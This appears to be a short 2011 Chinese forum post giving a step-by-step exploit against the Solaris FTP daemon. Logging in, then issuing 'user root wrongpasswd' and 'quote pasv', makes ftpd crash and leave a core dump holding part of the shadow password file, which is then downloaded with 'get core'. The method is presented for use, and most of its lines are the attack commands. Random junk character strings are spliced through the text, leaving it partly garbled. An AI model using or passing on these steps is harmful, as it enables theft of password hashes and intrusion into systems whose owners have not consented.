该方法利用了Solaris 操作系统中FTPD的一个BUG,使得用户可以获得该机的口令文件。具体过程如下: w `( Y3 z- Z6 @2 h8 D' p$ w3 E% S
& {- D+ q4 U" W1.通过 ftp 正常登录到目的主机上
7 k8 b8 S: p4 E5 w6 `$ U* O$ i8 ]. i5 l
2.输入如下命令序列:' Z- [& I- |, m% K: J: N
" ?# P* D* L2 e: Q. u( r( h$ @ftp> user root wrongpasswd2 t @, ?! C# f$ f( S- q
+ |0 b- F% @$ E4 F% E9 |( ^. }
ftp> quote pasv
7 b9 ], F+ U5 A+ d, [+ H- D/ `0 K7 i! T. _
3.这时,ftpd会报错退出,同时会在当前目录下生成一个core,口令文件就包含在这个core中。
5 Q) l9 k2 t; v7 U$ f! S% N2 `6 }2 H, T% a
4.再次进入FTP >get core4 h( ]& Y2 r- y$ x; T' m5 Z
' G. h! q9 c/ r$ r- V) s x补充:虽然在core只有一部分shadow,但是对于系统来说已经是致命的打击了
2 T7 \1 g" I, U- _+ N
$ c- C2 u( Z% T8 W3 m. T+ l. O |
|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港
( 鲁ICP备19052200号-1 )
发表于 2011-1-12 21:01:38
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡